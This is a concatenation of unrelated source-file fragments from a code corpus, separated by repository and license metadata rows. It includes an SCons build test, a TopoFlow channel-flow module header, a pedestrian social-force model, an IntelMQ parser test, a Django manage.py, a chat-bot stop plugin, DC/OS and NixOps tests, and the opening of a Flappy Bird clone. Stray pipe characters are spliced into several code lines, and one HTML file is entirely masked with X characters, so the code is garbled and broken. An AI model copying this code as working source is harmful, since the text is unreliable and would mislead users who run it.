test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 1\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 1\n")
test.must_match(['sub2', 'f6.out'], "f6.in\nsubdir/bar.dep 1\n")
#
test.write(['subdir', 'foo.dep'], "subdir/foo.dep 2\n")
test.write(['subdir', 'bar.dep'], "subdir/bar.dep 2\n")
test.write('f6.in', "f6.in 2\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 2\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 2\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 2\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 2\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 2\n")
test.must_match(['sub2', 'f6.out'], "f6.in 2\nsubdir/bar.dep 2\n")
#
test.write(['subdir', 'foo.dep'], "subdir/foo.dep 3\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 3\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 3\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 2\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 2\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 2\n")
test.must_match(['sub2', 'f6.out'], "f6.in 2\nsubdir/bar.dep 2\n")
#
test.write(['subdir', 'bar.dep'], "subdir/bar.dep 3\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 3\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 3\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 3\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 3\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 2\n")
test.must_match(['sub2', 'f6.out'], "f6.in 2\nsubdir/bar.dep 2\n")
#
test.write('f6.in', "f6.in 3\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 3\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 3\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 3\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 3\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 3\n")
test.must_match(['sub2', 'f6.out'], "f6.in 3\nsubdir/bar.dep 3\n")
test.write('SConstruct', """
ParseDepends('nonexistent_file')
""")
test.run()
test.write('SConstruct', """
ParseDepends('nonexistent_file', must_exist=1)
""")
test.run(status=2, stderr=None)
test.fail_test(string.find(test.stderr(), "No such file or directory") == -1)
test.pass_test()
|
mperignon/component_creator | topoflow_creator/topoflow/channels_base.py | Python | gpl-2.0 | 124,876 | 0.012324 |
## See "d_bankfull" in update_flow_depth() ######## (2/21/13)
## See "(5/13/10)" for a temporary fix.
#------------------------------------------------------------------------
# Copyright (c) 2001-2014, Scott D. Peckham
#
# Sep 2014. Wrote new update_diversions().
# New standard names and BMI updates and testing.
# Nov 2013. Converted TopoFlow to a Python package.
# Feb 2013. Adapted to use EMELI framework.
# Jan 2013. Shared scalar doubles are now 0D numpy arrays.
# This makes them mutable and allows components with
# a reference to them to see them change.
# So far: Q_outlet, Q_peak, Q_min...
# Jan 2013. Revised handling of input/output names.
# Oct 2012. CSDMS Standard Names and BMI.
# May 2012. Commented out diversions.update() for now. #######
# May 2012. Shared scalar doubles are now 1-element 1D numpy arrays.
# This makes them mutable and allows components with
# a reference to them to see them change.
# So far: Q_outlet, Q_peak, Q_min...
# May 2010. Changes to initialize() and read_cfg_file()
# Mar 2010. Changed codes to code, widths to width,
# angles to angle, nvals to nval, z0vals to z0val,
# slopes to slope (for GUI tools and consistency
# across all process components)
# Aug 2009. Updates.
# Jul 2009. Updates.
# May 2009. Updates.
# Jan 2009. Converted from IDL.
#-----------------------------------------------------------------------
# NB! In the CFG file, change MANNING and LAW_OF_WALL flags to
# a single string entry like "friction method". #########
#-----------------------------------------------------------------------
# Notes: Set self.u in manning and law_of_wall functions ??
# Update friction factor in manning() and law_of_wall() ?
# Double check how Rh is used in law_of_the_wall().
# d8_flow has "flow_grids", but this one has "codes".
# Make sure values are not stored twice.
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
# NOTES: This file defines a "base class" for channelized flow
# components as well as functions used by most or
# all channel flow methods. The methods of this class
# (especially "update_velocity") should be over-ridden as
# necessary for different methods of modeling channelized
# flow. See channels_kinematic_wave.py,
# channels_diffusive_wave.py and channels_dynamic_wave.py.
#-----------------------------------------------------------------------
# NOTES: update_free_surface_slope() is called by the
# update_velocity() methods of channels_diffusive_wave.py
# and channels_dynamic_wave.py.
#-----------------------------------------------------------------------
#
# class channels_component
#
# ## get_attribute() # (defined in each channel component)
# get_input_var_names() # (5/15/12)
# get_output_var_names() # (5/15/12)
# get_var_name() # (5/15/12)
# get_var_units() # (5/15/12)
#-----------------------------
# set_constants()
# initialize()
# update()
# finalize()
# set_computed_input_vars() # (5/11/10)
#----------------------------------
# initialize_d8_vars() ########
# initialize_computed_vars()
# initialize_diversion_vars() # (9/22/14)
# initialize_outlet_values()
# initialize_peak_values()
# initialize_min_and_max_values() # (2/3/13)
#-------------------------------------
# update_R()
# update_R_integral()
# update_discharge()
# update_diversions() # (9/22/14)
# update_flow_volume()
# update_flow_depth()
# update_free_surface_slope()
# update_shear_stress() # (9/9/14, dep | th-slope product)
# update_shear_speed() # (9/9/14)
# update_trapezoid_Rh()
# update_friction_factor() # (9/9/14)
#----------------------------------
# update_velocity() # (override as needed)
# update_velocity_on_edges()
# update_froude_number() # (9/9/14)
#----------------------------------
# update_outlet_values()
# update_ | peak_values() # (at the main outlet)
# update_Q_out_integral() # (moved here from basins.py)
# update_mins_and_maxes() # (don't add into update())
# check_flow_depth()
# check_flow_velocity()
#----------------------------------
# open_input_files()
# read_input_files()
# close_input_files()
#----------------------------------
# update_outfile_names()
# bundle_output_files() # (9/21/14. Not used yet)
# open_output_files()
# write_output_files()
# close_output_files()
# save_grids()
# save_pixel_values()
#----------------------------------
# manning_formula()
# law_of_the_wall()
# print_status_report()
# remove_bad_slopes()
# Functions: # (stand-alone versions of these)
# Trapezoid_Rh()
# Manning_Formula()
# Law_of_the_Wall()
#-----------------------------------------------------------------------
import numpy as np
import os, os.path
from topoflow.utils import BMI_base
# from topoflow.utils import d8_base
from topoflow.utils import file_utils ###
from topoflow.utils import model_input
from topoflow.utils import model_output
from topoflow.utils import ncgs_files ###
from topoflow.utils import ncts_files ###
from topoflow.utils import rtg_files ###
from topoflow.utils import text_ts_files ###
from topoflow.utils import tf_d8_base as d8_base
from topoflow.utils import tf_utils
#-----------------------------------------------------------------------
class channels_component( BMI_base.BMI_component ):
#-----------------------------------------------------------
# Note: rainfall_volume_flux *must* be liquid-only precip.
#-----------------------------------------------------------
_input_var_names = [
'atmosphere_water__rainfall_volume_flux', # (P_rain)
'glacier_ice__melt_volume_flux', # (MR)
## 'land_surface__elevation',
## 'land_surface__slope',
'land_surface_water__baseflow_volume_flux', # (GW)
'land_surface_water__evaporation_volume_flux', # (ET)
'soil_surface_water__infiltration_volume_flux', # (IN)
'snowpack__melt_volume_flux', # (SM)
'water-liquid__mass-per-volume_density' ] # (rho_H2O)
#------------------------------------------------------------------
# 'canals__count', # n_canals
# 'canals_entrance__x_coordinate', # canals_in_x
# 'canals_entrance__y_coordinate', # canals_in_y
# 'canals_entrance_water__volume_fraction', # Q_canals_fraction
# 'canals_exit__x_coordinate', # canals_out_x
# 'canals_exit__y_coordinate', # canals_out_y
# 'canals_exit_water__volume_flow_rate', # Q_canals_out
# 'sinks__count', # n_sinks
# 'sinks__x_coordinate', # sinks_x
# 'sinks__y_coordinate', # sinks_y
# 'sinks_water__volume_flow_rate', # Q_sinks
# 'sources__count', # n_sources
# 'sources__x_coordinate', # sources_x
# 'sources__y_coordinate', # sources_y
# 'sources_water__volume_flow_rate' ] # Q_sources
#----------------------------------
# Maybe add these out_vars later.
#----------------------------------
# ['time_sec', 'time_min' ]
_output_var_names = [
'basin_outlet_water_flow__half_of_fanning_friction_factor', # f_outlet
'bas |
yuhangc/planning_algorithms | environment/robots/humans.py | Python | mit | 1,684 | 0 | from environment.robots.robot2d_base import Robot2dCircular
from environment.robots.robot_utils import *
class HumanSimple(Robot2dCircular):
def __init__(self, size=0.3, max_vel=2.0, max_acc=5.0, uncertainty=0.0):
super(HumanSimple, self).__init__(size)
self.max_v = max_vel
self.max_acc = max_acc
self.v_std = uncertainty
self.vx = 0.0
self.vy = 0.0
self.x_goal = None
self.vd = None
self.k = None
# a damping factor
self.c = 0.1
def set_goal(self, x_goal, vd, k):
self.x_goal = x_goal
self.vd = vd
self.k = k
| def update(self, u, dt):
"""
Dynamic update, input is the "social force" that drives people
:param u: (fx, fy)
:param dt: time step
"""
# calculate the force that drives people to goal
x_rel_goal = self.x_goal - np.array([self.x, self.y])
v_goal | = self.vd * x_rel_goal / np.linalg.norm(x_rel_goal)
f_goal_x = self.k * (v_goal[0] - self.vx)
f_goal_y = self.k * (v_goal[1] - self.vy)
# calculate accelerations
ax = f_goal_x + u[0] - self.c * self.vx
ay = f_goal_y + u[1] - self.c * self.vy
# update velocity and positions
vx_next = self.vx + ax * dt
vy_next = self.vy + ay * dt
v_next = np.linalg.norm(np.array([vx_next, vy_next]))
if v_next > self.max_v:
vx_next *= self.max_v / v_next
vy_next *= self.max_v / v_next
self.x += 0.5 * (self.vx + vx_next) * dt
self.y += 0.5 * (self.vy + vy_next) * dt
self.vx = vx_next
self.vy = vy_next
|
sch3m4/intelmq | intelmq/tests/bots/parsers/dragonresearchgroup/test_parser_ssh.py | Python | agpl-3.0 | 598 | 0.001672 | # -*- coding: utf-8 -*-
from __future__ import unicode_litera | ls
import json
import unittest
import intelmq.lib.test as test
from intelmq.bots.parsers.dragonresearchgroup.parser_ssh import \
DragonResearchGroupSSHParserBot
class TestDragonResearchGroupSSHParserBot(test.BotTestCase, unittest.TestCase):
"""
A TestCase for DragonResearchGroupSSHParserBot.
"""
@classmethod
def set_bot(self):
self.bot_reference = DragonResearchGroupSSHParserBot
self.default_input_message = json.dumps({'__type': 'Report'})
if __name_ | _ == '__main__':
unittest.main()
|
individual-it/office-traffic-light | manage.py | Python | gpl-3.0 | 804 | 0 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "office.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import | may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
| "Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
Fogapod/VKBot | bot/plugins/plugin_stop.py | Python | mit | 684 | 0.001894 | # co | ding:utf8
class Plugin(object):
__doc__ = '''Плагин предназначен для остановки бота.
Для использования необходимо иметь уровень доступа {protection} или выше
Ключевые слова: [{keywords}]
Использование: {keyword}
Пример: {keyword}'''
name = 'stop'
keywords = (u'стоп', name, '!')
protection = 3
argument_required = False
def respond(self, msg, rsp, utils, *args, **kwargs):
utils.stop_bot()
rsp.text = u'Завершаю работу. Удачного времени суток!'
| return rsp |
dnaextrim/django_adminlte_x | adminlte/static/plugins/datatables/extensions/ColReorder/examples/simple.html.py | Python | mit | 17,013 | 0.036972 | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX XXXXXXX X XXXXX XXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX X
XXXXXXXXXXXXXXXXXXXXXXXX X
XXXX XXXXXXXXX
X XX
X XX
XXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXXXXXXXXX XXXXXXX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXX
XXXXXXX XXXXXXX XXXXX XXX XXXXX XXX XXXX XX XXX XXXXXXXXXX XXXXXXXX XXXX XXXXXXXXXX XXXXXXX XXX X XXXXXX XXX XXXX XXX XXX XXXXXXX XX XXXXX XXX XXXX XXX XXXXX
XXXXXX XXXXX XXX XXXX XX XXXXX XXXX XXXX XXX XXXXXX XX XX XXXXXXXXX XXX XXXXXX XXXXX XX XXXXX XXXXXXXXX XXX XXX XXXXXX XXXXXXXXXX XX XXXX XX XXXX XX XXX XXXXX
XXXXXX XX XXXXXXXXXXXXX
XXXXXXXXXXXXX XX XXXXX XX X XXXXXXXXX XXXXXXX XXX XXXXXXXXXXXXXX XXXXXXXXX XXXX XX XXXX XX XXXXXXXXXX XXXXXXX XXXXXXXXX XXXX XXXXX XXXX XXX XXXXXX XXX XXX
XXXXXXXXX XXXXXXXXXXXXXX XX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXX XXXXXX
XXXXXXXXXXX XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXX XXXX XXXXX XX XXX XXXXXXXXXX X XX XXXXX XX XXX XXXXXXX XXXXXXXXXX
XXXXXX
XXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXX
XXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXXX
XXXXXXXXX XXXXXXXXX
XXXXXXXXXXXXXXX
XXXXX
XXXXXXXX
XXXXXXX
XXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXXX
XXXXXXXXX XXXXXXXXX
XXXXXXXXXXXXXXX
XXXXX
XXXXXXXX
XXXXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXX | XXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
X | XXXXXXXXXX XXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXX
XXXXXXXXXX XXXXXXXXX XXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXX
XXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXX XXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXXXX
XXXXXXXXXX XXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXXXX XXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXXXX
XXXXXXXXXX XXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXX
XXXXXXXXX XXXXXXXXX XXXXXXX XXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXXX
XXXXXXXXXXX XXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXXXX XXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXXX
XXXXXXXXX XXXXXXXXX XXXXXXX XXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXX XXXXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXXX
XXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXXX XXXXXXXXXX
XXXXXXXXX XXXXXXXXX XXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXX XXXXXXXXX XXXXXXX XXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
X |
vishnu2kmohan/dcos-commons | frameworks/template/tests/test_overlay.py | Python | apache-2.0 | 945 | 0.003175 | import os
import pytest
import sdk_install
import sdk_networks
import sdk_utils
from tests import config
overlay_nostrict = pytest.mark.skipif(os.environ.get("SECURITY") == "strict",
reason="overlay tests currently broken in strict")
@pytest.fixture(scope='module', autouse=True)
def configure_package(configure_security):
try:
sdk_ins | tall.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
sdk_install.install(
config.PACKAGE_NAME,
config | .SERVICE_NAME,
config.DEFAULT_TASK_COUNT,
additional_options=sdk_networks.ENABLE_VIRTUAL_NETWORKS_OPTIONS)
yield # let the test session execute
finally:
sdk_install.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
@pytest.mark.sanity
@pytest.mark.smoke
@pytest.mark.overlay
@overlay_nostrict
@pytest.mark.dcos_min_version('1.9')
def test_install():
sdk_networks.check_task_network("template-0-node")
|
coreyoconnor/nixops | tests/functional/test_deploys_nixos.py | Python | lgpl-3.0 | 238 | 0.004202 | from nose import tools
from tests.functional import single_ma | chine_test
class TestDeploysNixos(single_machine_test.SingleMachineTest):
def run_check(self):
self.depl.deploy()
self.check_command("test -f /etc/NIXO | S")
|
Moshifan100/pythongame | game.py | Python | gpl-3.0 | 15,122 | 0.002711 | #!/usr/bin/python3
from itertools import cycle
import random
import sys
import math
import os
import pygame
import pickle
from pygame.locals import *
pgimagel = pygame.image.load
FPS = 30
SCREENWIDTH = 288
SCREENHEIGHT = 512
# amount by which base can maximum shift to left
PIPEGAPSIZE = 100 # gap between upper and lower part of pipe
BASEY = SCREENHEIGHT * 0.79
# image, sound and hitmask dicts
IMAGES, SOUNDS, HITMASKS = {}, {}, {}
# list of all possible players (tuple of 3 positions of flap)
PLYLIST = (
# red bird
(
'assets/sprites/redbird-upflap.png',
'assets/sprites/redbird-midflap.png',
'assets/sprites/redbird-downflap.png',
),
# blue bird
(
'assets/sprites/bluebird-upflap.png',
'assets/sprites/bluebird-midflap.png',
'assets/sprites/bluebird-downflap.png',
),
# yellow bird
(
'assets/sprites/yellowbird-upflap.png',
'assets/sprites/yellowbird-midflap.png',
'assets/sprites/yellowbird-downflap.png',
),
)
# list of backgrounds
BACKGROUNDS_LIST = (
'assets/sprites/background-day.png',
'assets/sprites/background-night.png',
)
# list of pipes
PIPE_LIST = (
'assets/sprites/pipe-green.png',
'assets/sprites/pipe-red.png',
'assets/sprites/pipe-blue.png',
)
try:
xrange
except NameError:
xrange = range
def main():
global SCREEN, FPSCLOCK
pygame.init()
FPSCLOCK = pygame.time.Clock()
SCREEN = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))
pygame.display.set_caption('Flappy Bird')
# game over sprite
IMAGES['gameover'] = pgimagel('assets/sprites/gameover.png').convert_alpha()
# message sprite for welcome screen
IMAGES['message'] = pgimagel('assets/sprites/message.png').convert_alpha()
# base (ground) sprite
IMAGES['base'] = pgimagel('assets/sprites/base.png').convert_alpha()
# numbers sprites for score display
IMAGES['numbers'] = (
pgimagel('assets/sprites/0.png').convert_alpha(),
pgimagel('assets/sprites/1.png').convert_alpha(),
pgimagel('assets/sprites/2.png').convert_alpha(),
pgimagel('assets/sprites/3.png').convert_alpha(),
pgimagel('assets/sprites/4.png').convert_alpha(),
pgimagel('assets/sprites/5.png').convert_alpha(),
pgimagel('assets/sprites/6.png').convert_alpha(),
pgimagel('assets/sprites/7.png').convert_alpha(),
pgimagel('assets/sprites/8.png').convert_alpha(),
pgimagel('assets/sprites/9.png').convert_alpha()
)
# sounds below
SOUNDS['die'] = pygame.mixer.Sound('assets/audio/die.ogg')
SOUNDS['hit'] = pygame.mixer.Sound('assets/audio/hit.ogg')
SOUNDS['point'] = pygame.mixer.Sound('assets/audio/point.ogg')
SOUNDS['swoosh'] = pygame.mixer.Sound('assets/audio/swoosh.ogg')
SOUNDS['wing'] = pygame.mixer.Sound('assets/audio/wing.ogg')
while True:
# select random background sprites
randBg = random.randint(0, len(BACKGROUNDS_LIST) - 1)
IMAGES['background'] = pgimagel(BACKGROUNDS_LIST[randBg]).convert()
# select random player sprites
rPlayer = random.randint(0, len(PLYLIST) - 1)
IMAGES['player'] = (
pgimagel(PLYLIST[rPlayer][0]).convert_alpha(),
pgimagel(PLYLIST[rPlayer][1]).convert_alpha(),
pgimagel(PLYLIST[rPlayer][2]).convert_alpha(),
)
# select random pipe sprites
pipeindex = random.randint(0, len(PIPE_LIST) - 1)
IMAGES['pipe'] = (
pygame.transform.rotate(
pgimagel(PIPE_LIST[pipeindex]).convert_alpha(), 180),
pgimagel(PIPE_LIST[pipeindex]).convert_alpha(),
)
# hismask for pipes
HITMASKS['pipe'] = (
getHitmask(IMAGES['pipe'][0]),
getHitmask(IMAGES['pipe'][1]),
)
# hitmask for player
HITMASKS['player'] = (
getHitmask(IMAGES['player'][0]),
getHitmask(IMAGES['player'][1]),
getHitmask(IMAGES['player'][2]),
)
movementInfo = showWelcomeAnimation()
crashInfo = mainGame(movementInfo)
showGameOverScreen(crashInfo)
def showWelcomeAnimation():
"""Shows welcome screen animation of flappy bird"""
# index of player to blit on screen
pIndex = 0
pIndexGen = cycle([0, 1, 2, 1])
# iterator used to change pIndex after every 5th iteration
loopIter = 0
playerx = int(SCREENWIDTH * 0.2)
playery = int((SCREENHEIGHT - IMAGES['player'][0].get_height()) / 2)
messagex = int((SCREENWIDTH - IMAGES['message'].get_width()) / 2)
messagey = int(SCREENHEIGHT * 0.12)
basex = 0
# amount by which base can maximum shift to left
